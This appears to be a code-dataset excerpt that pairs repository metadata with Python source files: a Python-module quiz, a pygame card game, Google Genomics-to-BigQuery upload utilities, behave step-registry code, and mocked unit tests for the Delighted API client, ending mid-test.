metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "Jessime/i_know_python",
"score": 4
}
|
#### File: i_know_python/i_know_python/main.py
```python
import pkg_resources
def run():
libraries = pkg_resources.resource_filename(__name__, 'data/library37.txt')
used = []
unused = []
welcome = "Welcome to 'I know Python'!\nAnswer these questions to the best of your ability.\n"
print(welcome)
with open(libraries, encoding='utf-8') as file:
for line in file:
line = line.strip()
if '—' in line:
while True:
result = input(f"Have you used:\n\t {line}\n[y/n]? ").lower()
if result == 'y':
used.append(line)
break
elif result == 'n':
unused.append(line)
break
else:
print("Please respond with 'y' or 'n'.")
print('='*12 + '\nUsed modules\n' + '='*12)
for module in used:
print(module)
print('\n' + '='*14 + '\nUnused modules\n' + '='*14)
for module in unused:
print(module)
print(f'\n# of used modules: {len(used)}\n# of unused modules: {len(unused)}')
if __name__ == '__main__':
run()
```
|
{
"source": "Jessime/revenge_of_arius",
"score": 3
}
|
#### File: Jessime/revenge_of_arius/audio.py
```python
import pygame #, winsound
def skip():
while pygame.mixer.music.get_busy():
for event in pygame.event.get():
if event.type == pygame.MOUSEBUTTONUP:
pygame.mixer.music.stop()
else:
pass
def tutorial():
#pygame.event.pump
tut_pics = []
for i in range(19):
tut_pics.append(pygame.image.load("tut"+str(i+1)+".png"))
for i in range (2, 6):
pygame.mixer.music.load("audio"+str(i)+".wav")
pygame.mixer.music.play(0, 0)
skip()
screen = pygame.display.set_mode([1300, 675])
for i in range(19):
screen.blit(tut_pics[i], [0,0])
pygame.display.flip()
pygame.mixer.music.load("audio"+str(i+6)+".wav")
pygame.mixer.music.play(0, 0)
skip()
#winsound.PlaySound("audio"+str(i)+".wav", winsound.SND_FILENAME)
####
#### screen.blit(tut_pics[0], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio6.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[1], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio7.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[2], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio8.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[3], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio9.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[4], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio10.wav", winsound.SND_FILENAME)
#### screen.blit(tut_pics[5], [0,0])
#### pygame.display.flip()
#### winsound.PlaySound("audio11.wav", winsound.SND_FILENAME)
# screen.blit(tut_pics[6], [0,0])
# pygame.display.flip()
## pygame.event.pump
## winsound.PlaySound("audio12.wav", winsound.SND_FILENAME)
## pygame.event.pump
## screen.blit(tut_pics[7], [0,0])
## pygame.display.flip()
## winsound.PlaySound("audio13.wav", winsound.SND_FILENAME)
## pygame.event.pump
## screen.blit(tut_pics[8], [0,0])
## pygame.display.flip()
## winsound.PlaySound("audio14.wav", winsound.SND_FILENAME)
## pygame.event.pump
## screen.blit(tut_pics[9], [0,0])
## pygame.display.flip()
## winsound.PlaySound("audio15.wav", winsound.SND_FILENAME)
## pygame.event.pump
# pygame.mixer.music.load("audio12.wav")
# pygame.mixer.music.play(0, 0)
# while pygame.mixer.music.get_busy():
# for event in pygame.event.get():
# pass
screen = pygame.display.set_mode([540, 720])
#pygame.quit()
```
#### File: Jessime/revenge_of_arius/cards.py
```python
import pygame
class Unit(pygame.sprite.Sprite):
def __init__(self, option_number, image, card_info_list):
self.health = card_info_list[option_number][0]
self.damage = card_info_list[option_number][1]
self.speed = card_info_list[option_number][2]
self.ice_resistance = card_info_list[option_number][3]
self.fire_resistance = card_info_list[option_number][4]
self.lightning_resistance = card_info_list[option_number][5]
self.cost = card_info_list[option_number][6]
self.x = card_info_list[option_number][7]
self.y = card_info_list[option_number][8]
self.pix_x = (card_info_list[option_number][9])
self.pix_y = card_info_list[option_number][10]
self.p_designation = card_info_list[option_number][11]
self.image = image
self.name = card_info_list[option_number][12]
self.spell_list = []
self.c_i_l = card_info_list
self.casting = False
def move_card1(self, card_list, grid):
for i in range(self.speed):
blocking = 0
for card in card_list:
if (card.x == self.x + 1 and
card.y == self.y and
isinstance(card, Spell) != True and
self.p_designation != card.p_designation or
self.x == 14):
blocking += 1
if blocking == 0:
self.pix_x += 62
self.x += 1
self.x, self.y = grid[self.y][self.x].add_card(self)
grid[self.y][self.x-1].remove_card(self)
def move_card2(self, card_list, grid):
for i in range(self.speed):
blocking = 0
for card in card_list:
if (card.x == self.x - 1 and
card.y == self.y and
isinstance(card, Spell) != True and
self.p_designation != card.p_designation or
self.x == 1):
blocking += 1
if blocking == 0:
self.pix_x -= 62
self.x -= 1
self.x, self.y = grid[self.y][self.x].add_card(self)
grid[self.y][self.x+1].remove_card(self)
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
def draw_popup_card(self, screen, corner, card_width):
self.pix_x = corner[0]+card_width
self.pix_y = corner[1]
screen.blit(self.image, [self.pix_x, self.pix_y])
def pop_spells(self, card_pics):
height = 0
counter = 0
self.spell_list.append(Spell(3, card_pics[3], self.c_i_l))
self.spell_list.append(Spell(4, card_pics[4], self.c_i_l))
self.spell_list.append(Spell(5, card_pics[5], self.c_i_l))
for card in self.spell_list:
if self.y <= 3:
height += 54
elif self.y > 3:
height -= 54
card.pix_x = self.pix_x
card.pix_y = self.pix_y + height
card.p_designation = self.p_designation
if card.p_designation == 1:
card.image = card_pics[counter + 3]
if card.p_designation == 2:
card.image = card_pics[counter + 15]
counter += 1
#Displays the red cards for placing spells in the proper location
def add_spell(self, grid, screen):
info_card5 = pygame.image.load("info_card5.png")
for i in range(8):
for j in range(16):
if self.p_designation == 1 and self.name == "santa":
if ((grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y-1 == self.y) or
(grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y+1 == self.y) or
(grid[i][j].x-1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 2 and self.name == "santa":
if ((grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y-1 == self.y) or
(grid[i][j].x-1 <= self.x <= grid[i][j].x+1 and grid[i][j].y+1 == self.y) or
(grid[i][j].x+1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 1 and self.name == "reindeer":
if ((grid[i][j].x-2 == self.x and grid[i][j].y-2 == self.y) or
(grid[i][j].x-2 == self.x and grid[i][j].y+2 == self.y) or
(grid[i][j].x-1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 2 and self.name == "reindeer":
if ((grid[i][j].x+2 == self.x and grid[i][j].y-2 == self.y) or
(grid[i][j].x+2 == self.x and grid[i][j].y+2 == self.y) or
(grid[i][j].x+1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 1 and self.name == "elf":
if ((grid[i][j].x == self.x and grid[i][j].y-1 >= self.y >= grid[i][j].y-2) or
(grid[i][j].x == self.x and grid[i][j].y+1 <= self.y <= grid[i][j].y+2) or
(grid[i][j].x-1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
elif self.p_designation == 2 and self.name == "elf":
if ((grid[i][j].x == self.x and grid[i][j].y-1 >= self.y >= grid[i][j].y-2) or
(grid[i][j].x == self.x and grid[i][j].y+1 <= self.y <= grid[i][j].y+2) or
(grid[i][j].x+1 == self.x and grid[i][j].y == self.y)):
screen.blit(info_card5, [grid[i][j].pix_x, grid[i][j].pix_y])
class Spell(pygame.sprite.Sprite):
def __init__(self, option_number, image, card_info_list):
self.elf_caster = card_info_list[option_number][0]
self.santa_caster = card_info_list[option_number][1]
self.reindeer_caster = card_info_list[option_number][2]
self.duration = card_info_list[option_number][3]
self.cost = card_info_list[option_number][4]
self.x = card_info_list[option_number][5]
self.y = card_info_list[option_number][6]
self.pix_x = card_info_list[option_number][7]
self.pix_y = card_info_list[option_number][8]
self.p_designation = card_info_list[option_number][9]
self.image = image
self.name = card_info_list[option_number][10]
self.damage = int
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
def check_duration(self):
if self.duration >= 1:
self.duration -= 1
def casting_damage(self, action):
if action == 2.1 or action == 6.1:
self.damage = self.santa_caster
if action == 2.2 or action == 6.2:
self.damage = self.reindeer_caster
if action == 2.3 or action == 6.3:
self.damage = self.elf_caster
class Defense(pygame.sprite.Sprite):
def __init__(self, option_number, image, card_info_list):
self.health = card_info_list[option_number][0]
self.damage = card_info_list[option_number][1]
self.cost = card_info_list[option_number][2]
self.x = card_info_list[option_number][3]
self.y = card_info_list[option_number][4]
self.pix_x = card_info_list[option_number][5]
self.pix_y = card_info_list[option_number][6]
self.p_designation = card_info_list[option_number][7]
self.image = image
self.name = card_info_list[option_number][8]
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
class Production(pygame.sprite.Sprite):
def __init__(self, option_number, image, card_info_list):
self.production_type = card_info_list[option_number][0]
self.health = card_info_list[option_number][1]
self.pro_rate = card_info_list[option_number][2]
self.cost = card_info_list[option_number][3]
self.x = card_info_list[option_number][4]
self.y = card_info_list[option_number][5]
self.pix_x = card_info_list[option_number][6]
self.pix_y = card_info_list[option_number][7]
self.p_designation = card_info_list[option_number][8]
self.image = image
self.name = card_info_list[option_number][9]
self.damage = 0
def draw_card(self):
self.pix_x += (self.x * 62)
self.pix_y += (self.y * 54)
```
#### File: Jessime/revenge_of_arius/events.py
```python
import pygame, textbox, play_cards, cards, gather, buttons
def downclick(pick_card, player_turn, card_num, card_list,
p1, p2, card_pics, grid, screen, rand_x, rand_y,
bag_visible, gather_mana, popup):
# Set the width, height, margin of each grid location
width = 60
height = 52
margin = 2
spell_visible = False
# Initialize grid coordinates
x = int
y = int
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
if (153 < pos[0] < 1145) and (120 < pos[1] < 552):
# Change the x/y screen coordinates to grid coordinates if popup window isn't open
if popup == []:
x = (pos[0]-153) // (width + margin)
y = (pos[1]-120) // (height + margin)
# Check if mana bag has been clicked
if bag_visible == True and rand_x == x and rand_y == y:
bag_visible = False
gather_mana = True
buttons.btn_dic["gather_btn"] = buttons.gather_btn
# Check if card has been selected
elif pick_card == True:
pick_card = False
action = play_cards.placement_check(player_turn, card_num, p1, p2, x, y, popup, card_list)
play_cards.place_card(action, card_num, card_pics, card_list, grid, x, y, p1, p2, player_turn)
# Check if pop_up window should be created or closed
elif (len(grid[y][x].occupants_list) != 0 and
grid[y][x].fogged == False):
popup = [x, y]
elif popup != []: #If popup is open
# Check if spells should be displayed for casting in pop_up window
for pop_card in grid[popup[1]][popup[0]].occupants_list:
if (pop_card.pix_x <= pos[0] <= pop_card.pix_x + 60 and
pop_card.pix_y <= pos[1] <= pop_card.pix_y + 52 and
pop_card.p_designation == player_turn and
isinstance(pop_card, cards.Unit)): #If unit is clicked
if pop_card.spell_list == []: #If spells aren't showing
pop_card.pop_spells(card_pics) #Show spells
spell_visible = True
elif isinstance(pop_card, cards.Unit):
for spell_card in pop_card.spell_list:
if spell_card.pix_x <= pos[0] <= spell_card.pix_x + 60 and spell_card.pix_y <= pos[1] <= spell_card.pix_y + 52:
pop_card.casting = True #Signals a Unit attempting to casting a spell
pick_card = True
if popup[1] <= 3: # For the top half
card_num = ((pos[1]-(pop_card.pix_y + 52))// (height+margin))+ 3 # Weird math to find card number based on pixel location
else: # For the bottom half
card_num = ((pop_card.pix_y - (pos[1]-2))// (height+margin))+ 3
# Close the pop up window
if spell_visible == False:
grid[popup[1]][popup[0]].close_pop()
popup = []
# Check if card is clicked
elif (312 <= pos[0] < 498) and (33 < pos[1] < 85):
card_num = (pos[0]-312)// (width+margin)
pick_card = True
elif (498 <= pos[0] < 868) and (33 < pos[1] < 85):
card_num = (186+(pos[0]-312))// (width+margin)
pick_card = True
# Check if end turn is clicked
else:
for btn in buttons.btn_dic.values():
btn.check_dclick(pos)
return pick_card, card_num, x, y, bag_visible, gather_mana, popup
def upclick(countdown, text_btn, display_timer, gather_mana, mana_increase, correct):
pos = pygame.mouse.get_pos()
"""get_mana(button, textbox)"""
# Check if button is released
for btn in buttons.btn_dic.values():
btn.check_uclick(pos)
# Process actions for button clicks
if buttons.btn_dic["end_turn"].clicked == True:
buttons.btn_dic["end_turn"].clicked = False
countdown, display_timer = 0,0
elif buttons.btn_dic.get("gather_btn") != None:
if buttons.btn_dic["gather_btn"].clicked == True:
buttons.btn_dic["gather_btn"].clicked = False
if text_btn.string == str(mana_increase) and gather_mana == True:
correct = True
else:
text_btn.str_list = [""]
text_btn.selected = False
# Check if textbox button has been clicked
if gather_mana == True and text_btn.rect.collidepoint(pos):
if text_btn.selected == False:
text_btn.selected = True
else:
text_btn.selected = False
return countdown, display_timer, correct
```
#### File: Jessime/revenge_of_arius/gather.py
```python
import pygame, random, textbox, buttons
def get_random():
rand_column = random.randint(1, 14)
rand_row = random.randint(0, 7)
return rand_column, rand_row
# Draw the mana bag during allowed time as long as the bag hasn't been clicked
def gather_mana(rand_x, rand_y, bag_visible, grid, screen):
if bag_visible == True:
bag = pygame.image.load("present_bag.png")
screen.blit(bag, [grid[rand_y][rand_x].pix_x, grid[rand_y][rand_x].pix_y])
# Draw textbox and mana button during allowed time if the mana bag has been clicked
def gathering(gather_mana, correct, mana_increase, screen, player_turn, text_btn):
font = pygame.font.Font(None, 30)
info_card7 = pygame.image.load("info_card7.png")
info_card8 = pygame.image.load("info_card8.png")
if gather_mana == True and correct == False:
num_text1 = font.render("Mana ",True,[0,0,0])
num_text2 = font.render(str(mana_increase),True,[0,0,0])
if player_turn == 1:
screen.blit(info_card7, [906, 0])
else:
screen.blit(info_card8, [906, 0])
screen.blit(num_text1, [940, 72])
screen.blit(num_text2, [945, 92])
text_btn.update(screen)
# Called if mana has been correctly entered. Gives player mana.
def gathered(correct, gather_mana, text_btn, p1, p2, player_turn, mana_increase):
if correct == True:
correct = False
gather_mana = False
text_btn.selected = False
text_btn.str_list = [""]
text_btn.string= ''.join(text_btn.str_list)
del buttons.btn_dic["gather_btn"]
# If player1 gained mana
if player_turn == 1:
p1.mana += mana_increase
# If player2 gained mana
elif player_turn == 2:
p2.mana += mana_increase
return correct, gather_mana
def reset_gather(text_btn):
bag_visible = False
gather_mana = False
text_btn.selected = False
text_btn.str_list = [""]
text_btn.string = ''.join(text_btn.str_list)
# Delete the gather button from list if it hasn't been already
if buttons.btn_dic.get("gather_btn") != None:
del buttons.btn_dic["gather_btn"]
return bag_visible, gather_mana
```
|
{
"source": "Jessime/variant-annotation",
"score": 2
}
|
#### File: curation/tables/vcf_to_bigquery_utils.py
```python
import logging
import time
from apiclient import discovery
from oauth2client.client import GoogleCredentials
from retrying import retry
# Use tensorflow.gfile library, if available, to expand wildcards (optional).
try:
from tensorflow import gfile
except ImportError:
gfile = None
import schema_update_utils
class VcfUploader(object):
"""Class for managing a Google Genomics API connection and data transfers.
Handles finding and creating variant sets and datasets and uploading and
exporting variants stored in VCF. The main entry point is
upload_variants(...), but other intermediate pipeline steps may also be used.
"""
def __init__(self, project, credentials=None):
"""Create VcfUploader class.
Args:
project: Cloud project to use for Genomics objects.
credentials: Credentials object to use, get_application_default() if None.
"""
if credentials is None:
credentials = GoogleCredentials.get_application_default()
self.project = project
self.service = discovery.build("genomics", "v1", credentials=credentials)
@staticmethod
def find_id_or_name(name, candidates):
"""Find a value linked as "id" or "name" in a collection of dicts.
Args:
name: string to search for in "id" and "name" fields.
candidates: collection of dicts that should have "id" and "name" keys.
Returns:
choice["id"] for the unique matching choice (matched by "name" or "id").
Returns None if no matching choice is found.
Raises:
LookupError: If multiple items match the targeted name.
"""
target_id = None
for choice in candidates:
if choice.get("id") == name or choice.get("name") == name:
if target_id is not None:
raise LookupError("Found multiple hits for requested name")
target_id = choice["id"]
return target_id
def find_or_create_dataset(self,
dataset_name,
always_create=False):
"""Finds or creates a Google Genomics dataset by name or id.
If an existing dataset in the project has a name or ID of dataset_name, it
will be reused and its id will be returned, unless always_create is True.
A new dataset will be created if an existing one is not found.
Args:
dataset_name: Name or id of existing dataset, or name for a new dataset.
always_create: Always create a new dataset with the requested name.
Returns:
The id of the existing or newly-created Genomics dataset.
"""
request = self.service.datasets().list(projectId=self.project)
response = request.execute()
dataset_id = self.find_id_or_name(dataset_name,
response["datasets"])
if dataset_id is None or always_create:
request = self.service.datasets().create(
body={"name": dataset_name,
"projectId": self.project})
response = request.execute()
dataset_id = response["id"]
return dataset_id
def find_or_create_variantset(self,
variantset_name,
dataset_id,
description="",
always_create=False):
"""Finds or creates a Google Genomics variant set by name or id.
If an existing variant set in the project has a name or ID of
variantset_name, it will be reused and its id will be returned, unless
always_create is True. A new variant set will be created if an existing
one is not found.
Args:
variantset_name: Name or id of existing variant set, or name for a new
variant set.
dataset_id: Id of the dataset to find or create the variant set.
description: The description for the variant set.
always_create: Always create a new variant set with the requested name.
Returns:
The id of the existing or newly-created Genomics variant set.
"""
request = self.service.variantsets().search(
body={"datasetIds": dataset_id})
response = request.execute()
variantset_id = self.find_id_or_name(variantset_name,
response["variantSets"])
if variantset_id is None or always_create:
request = self.service.variantsets().create(
body={"name": variantset_name,
"datasetId": dataset_id,
"description": description,
})
response = request.execute()
variantset_id = response["id"]
return variantset_id
def import_variants(self, source_uris, variantset_id):
"""Imports variants stored in a VCF file on Cloud Storage to a variant set.
Args:
source_uris: List of paths to VCF file[s] in Cloud Storage, wildcards
accepted (*, not **).
variantset_id: Id of the variant set to load the variants.
Returns:
The name of the loading operation.
"""
request = self.service.variants().import_(
body={"variantSetId": variantset_id,
"sourceUris": source_uris})
response = request.execute()
return response["name"]
# Handle transient HTTP errors by retrying several times before giving up.
# Works around race conditions that arise when the operation ID is not
# found, which yields a 404 error.
@retry(stop_max_attempt_number=10, wait_exponential_multiplier=2000)
def wait_for_operation(self, operation_id, wait_seconds=30):
"""Blocks until the Genomics operation completes.
Args:
operation_id: The name (id string) of the loading operation.
wait_seconds: Number of seconds to wait between polling attempts.
Returns:
True if the operation succeeded, False otherwise.
"""
request = self.service.operations().get(name=operation_id)
while not request.execute()["done"]:
time.sleep(wait_seconds)
# If the operation succeeded, there will be a "response" field and not an
# "error" field, see:
# https://cloud.google.com/genomics/reference/rest/Shared.Types/ListOperationsResponse#Operation
response = request.execute()
return "response" in response and "error" not in response
def export_variants(self, variantset_id, destination_table):
"""Exports variants from Google Genomics to BigQuery.
Per the Genomics API, this will overwrite any existing BigQuery table with
this name.
Args:
variantset_id: Id of the variant set to export.
destination_table: BigQuery output, as PROJECT_ID.DATASET_NAME.TABLE_NAME.
Returns:
The name of the export operation.
"""
tokenized_table = schema_update_utils.tokenize_table_name(destination_table)
bigquery_project_id, dataset_name, table_name = tokenized_table
request = self.service.variantsets().export(
variantSetId=variantset_id,
body={"projectId": bigquery_project_id,
"bigqueryDataset": dataset_name,
"bigqueryTable": table_name})
response = request.execute()
return response["name"]
def upload_variants(self,
dataset,
variantset,
source_vcfs,
destination_table,
expand_wildcards=False,
new_dataset=False,
new_variantset=False,
description=None):
"""Imports variants stored in a VCF in Cloud Storage to BigQuery.
Handle all intermediate steps, including finding dataset and variant sets.
Args:
dataset: Name or id of existing dataset, or name for a new dataset.
variantset: Name or id of existing variant set, or name for a new one.
source_vcfs: List of VCF file[s] in Cloud Storage, wildcards accepted
(*, not **).
destination_table: BigQuery output, as PROJECT_ID.DATASET_NAME.TABLE_NAME.
expand_wildcards: Expand wildcards in VCF paths and use parallel imports.
new_dataset: Always create a new dataset with the requested name.
new_variantset: Always create a new variant set with the requested name.
description: Optional description for the BigQuery table.
Raises:
RuntimeError: If an upload or export request does not succeed.
"""
dataset_id = self.find_or_create_dataset(dataset,
always_create=new_dataset)
variantset_id = self.find_or_create_variantset(
variantset,
dataset_id,
description="\t".join(source_vcfs),
always_create=new_variantset)
# Spawn off parallel imports for each VCF.
if expand_wildcards and gfile is not None:
# Expand any wildcarded paths and concatenate all files together.
source_vcfs = sum([gfile.Glob(source_vcf) for source_vcf in source_vcfs],
[])
operation_ids = []
for source_vcf in source_vcfs:
operation_ids.append(self.import_variants(source_vcf, variantset_id))
logging.info("Importing %s (%s)", source_vcf, operation_ids[-1])
# Wait for all imports to complete successfully before exporting variantset.
for operation_id in operation_ids:
if not self.wait_for_operation(operation_id):
raise RuntimeError("Failed to import variants to Genomics (%s)"
% operation_id)
operation_id = self.export_variants(variantset_id, destination_table)
logging.info("Exporting %s (%s)", variantset, operation_id)
if not self.wait_for_operation(operation_id):
raise RuntimeError("Failed to export variants to BigQuery (%s)"
% operation_id)
# Assume the VCF header is the same for all files and so just use the first.
logging.info("Updating schema for %s", variantset)
schema_update_utils.update_table_schema(destination_table,
source_vcfs[0],
description=description)
```
|
{
"source": "jessingrass/behave",
"score": 2
}
|
#### File: behave/behave4cmd0/note_steps.py
```python
from behave import step
# -----------------------------------------------------------------------------
# STEPS FOR: remarks/comments
# -----------------------------------------------------------------------------
@step(u'note that "{remark}"')
def step_note_that(context, remark):
"""
Used as generic step that provides an additional remark/hint
and enhance the readability/understanding without performing any check.
.. code-block:: gherkin
Given that today is "April 1st"
But note that "April 1st is Fools day (and beware)"
"""
log = getattr(context, "log", None)
if log:
log.info(u"NOTE: %s;" % remark)
```
#### File: behave/behave/step_registry.py
```python
class AmbiguousStep(ValueError):
pass
class StepRegistry(object):
def __init__(self):
self.steps = {
'given': [],
'when': [],
'then': [],
'step': [],
}
@staticmethod
def same_step_definition(step, other_string, other_location):
return (step.string == other_string and
step.location == other_location and
other_location.filename != "<string>")
def add_step_definition(self, keyword, string, func):
# TODO try to fix module dependencies to avoid this
from behave import matchers, model
step_location = model.Match.make_location(func)
step_type = keyword.lower()
step_definitions = self.steps[step_type]
for existing in step_definitions:
if self.same_step_definition(existing, string, step_location):
# -- EXACT-STEP: Same step function is already registered.
# This may occur when a step module imports another one.
return
elif existing.match(string):
message = '%s has already been defined in\n existing step %s'
new_step = u"@%s('%s')" % (step_type, string)
existing.step_type = step_type
existing_step = existing.describe()
existing_step += " at %s" % existing.location
raise AmbiguousStep(message % (new_step, existing_step))
step_definitions.append(matchers.get_matcher(func, string))
def find_step_definition(self, step):
candidates = self.steps[step.step_type]
more_steps = self.steps['step']
if step.step_type != 'step' and more_steps:
# -- ENSURE: self.step_type lists are not modified/extended.
candidates = list(candidates)
candidates += more_steps
for step_definition in candidates:
if step_definition.match(step.name):
return step_definition
return None
def find_match(self, step):
candidates = self.steps[step.step_type]
more_steps = self.steps['step']
if step.step_type != 'step' and more_steps:
# -- ENSURE: self.step_type lists are not modified/extended.
candidates = list(candidates)
candidates += more_steps
for step_definition in candidates:
result = step_definition.match(step.name)
if result:
return result
return None
def make_decorator(self, step_type):
# pylint: disable=W0621
# W0621: 44,29:StepRegistry.make_decorator: Redefining 'step_type' ..
def decorator(string):
def wrapper(func):
self.add_step_definition(step_type, string, func)
return func
return wrapper
return decorator
registry = StepRegistry()
# -- Create the decorators
def setup_step_decorators(context=None, registry=registry):
if context is None:
context = globals()
for step_type in ('given', 'when', 'then', 'step'):
step_decorator = registry.make_decorator(step_type)
context[step_type.title()] = context[step_type] = step_decorator
# -----------------------------------------------------------------------------
# MODULE INIT:
# -----------------------------------------------------------------------------
# limit import * to just the decorators
names = 'given when then step'
names = names + ' ' + names.title()
__all__ = names.split()
setup_step_decorators()
```
|
{
"source": "jessjass/cs3240-labdemo",
"score": 2
}
|
#### File: jessjass/cs3240-labdemo/helper.py
```python
__author__ = "<NAME> (jj5dp)"
def greeting(msg):
print(msg)
```
|
{
"source": "jesska-f/delighted-python",
"score": 2
}
|
#### File: delighted-python/test/test_resource.py
```python
import delighted
from delighted.util import aware_datetime_to_epoch_seconds, \
naive_date_to_datetime
from . import get_headers, post_headers, DelightedTestCase
from delighted.errors import TooManyRequestsError
import datetime
import pytz
import tzlocal
from base64 import b64encode
from mock import patch
from six import b
import sys
class TestResource(DelightedTestCase):
def setUp(self):
super(TestResource, self).setUp()
def check_retrieving_metrics(self, client=None):
data = {'nps': 10}
url = 'https://api.delightedapp.com/v1/metrics'
self.mock_response(200, {}, data)
expected_headers = get_headers.copy()
retrieve_kwargs = {}
if client:
retrieve_kwargs['client'] = client
expected_headers['Authorization'] = 'Basic %s' % b64encode(b(client.api_key)).decode('ascii')
metrics = delighted.Metrics.retrieve(**retrieve_kwargs)
self.check_call('get', url, expected_headers, {}, None)
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def test_retrieving_metrics(self):
self.check_retrieving_metrics()
def test_retrieving_metrics_other_client(self):
client = delighted.Client(api_key='example')
self.check_retrieving_metrics(client=client)
def test_retrieving_metrics_range_unixtimestamp(self):
data = {'nps': 10}
self.mock_response(200, {}, data)
since = 1425168000
until = 1430348400
url = 'https://api.delightedapp.com/v1/metrics'
metrics = delighted.Metrics.retrieve(since=since, until=until)
self.check_call('get', url, get_headers, None,
{'since': 1425168000, 'until': 1430348400})
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def test_retrieving_metrics_range_date_object(self):
data = {'nps': 10}
self.mock_response(200, {}, data)
since = datetime.date(2013, 10, 1)
until = datetime.date(2013, 11, 1)
timezone = tzlocal.get_localzone()
since_seconds = self._naive_date_to_epoch_seconds(since, timezone)
until_seconds = self._naive_date_to_epoch_seconds(until, timezone)
url = 'https://api.delightedapp.com/v1/metrics'
metrics = delighted.Metrics.retrieve(since=since, until=until)
self.check_call('get', url, get_headers, None,
{'since': since_seconds, 'until': until_seconds})
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def test_retrieving_metrics_range_datetime_object(self):
data = {'nps': 10}
self.mock_response(200, {}, data)
timezone = pytz.timezone('America/Chicago')
since = timezone.localize(datetime.datetime(2013, 10, 1))
until = timezone.localize(datetime.datetime(2013, 11, 1))
url = 'https://api.delightedapp.com/v1/metrics'
metrics = delighted.Metrics.retrieve(since=since, until=until)
self.check_call('get', url, get_headers, None,
{'since': 1380603600, 'until': 1383282000})
self.assertTrue(delighted.Metrics is type(metrics))
self.assertEqual(dict(metrics), data)
self.assertEqual(metrics.nps, 10)
self.assertRaises(AttributeError, lambda: metrics.id)
def check_creating_or_updating_a_person(self, client=None):
email = '<EMAIL>'
data = {'id': '123', 'email': email}
url = 'https://api.delightedapp.com/v1/people'
self.mock_response(200, {}, data)
expected_headers = post_headers.copy()
create_kwargs = {'email': email}
if client:
create_kwargs['client'] = client
expected_headers['Authorization'] = 'Basic %s' % b64encode(b(client.api_key)).decode('ascii')
person = delighted.Person.create(**create_kwargs)
self.assertTrue(delighted.Person is type(person))
self.assertEqual(person, {'id': '123', 'email': email})
self.assertEqual(person.email, email)
self.assertEqual('123', person.id)
self.check_call('post', url, expected_headers, {'email': email}, None)
def test_creating_or_updating_a_person(self):
self.check_creating_or_updating_a_person()
def test_creating_or_updating_a_person_other_client(self):
client = delighted.Client(api_key='example')
self.check_creating_or_updating_a_person(client=client)
def test_unsubscribing_a_person(self):
email = '<EMAIL>'
data = {'person_email': email}
url = 'https://api.delightedapp.com/v1/unsubscribes'
self.mock_response(200, {}, {'ok': True})
delighted.Unsubscribe.create(person_email=email)
self.check_call('post', url, post_headers, data, None)
def test_deleting_a_person_by_multiple_identifiers(self):
self.assertRaises(ValueError, lambda: delighted.Person.delete(id=42, email="<EMAIL>"))
def test_deleting_a_person_by_id(self):
url = 'https://api.delightedapp.com/v1/people/42'
self.mock_response(202, {}, {'ok': True})
delighted.Person.delete(id=42)
self.check_call('delete', url, post_headers, {}, None)
def test_deleting_a_person_by_email(self):
url = 'https://api.delightedapp.com/v1/people/email%3Afoo%40example.com'
self.mock_response(202, {}, {'ok': True})
delighted.Person.delete(email='<EMAIL>')
self.check_call('delete', url, post_headers, {}, None)
def test_deleting_a_person_by_phone_number(self):
url = 'https://api.delightedapp.com/v1/people/phone_number%3A%2B14155551212'
self.mock_response(202, {}, {'ok': True})
delighted.Person.delete(phone_number='+14155551212')
self.check_call('delete', url, post_headers, {}, None)
def test_deleting_pending_survey_requests_for_a_person(self):
email = '<EMAIL>'
url = 'https://api.delightedapp.com/v1/people/foo%40bar.com' + \
'/survey_requests/pending'
self.mock_response(200, {}, {'ok': True})
result = delighted.SurveyRequest.delete_pending(person_email=email)
self.assertTrue(dict is type(result))
self.assertEqual({'ok': True}, result)
self.check_call('delete', url, post_headers, {}, None)
def test_creating_a_survey_response(self):
url = 'https://api.delightedapp.com/v1/survey_responses'
data = {'id': '456', 'person': '123', 'score': 10}
self.mock_response(200, {}, data)
survey_response = delighted.SurveyResponse.create(person='123',
score=10)
self.assertTrue(delighted.SurveyResponse is type(survey_response))
self.assertEqual({'id': '456', 'person': '123', 'score': 10}, survey_response)
self.assertEqual('123', survey_response.person)
self.assertEqual(10, survey_response.score)
self.assertEqual('456', survey_response.id)
resp = {'person': '123', 'score': 10}
self.check_call('post', url, post_headers, resp, None)
def test_retrieving_a_survey_response_expand_person(self):
url = 'https://api.delightedapp.com/v1/survey_responses/456'
resp = {'id': '456',
'person': {'id': '123', 'email': '<EMAIL>', 'type': 'aaa'},
'score': 10}
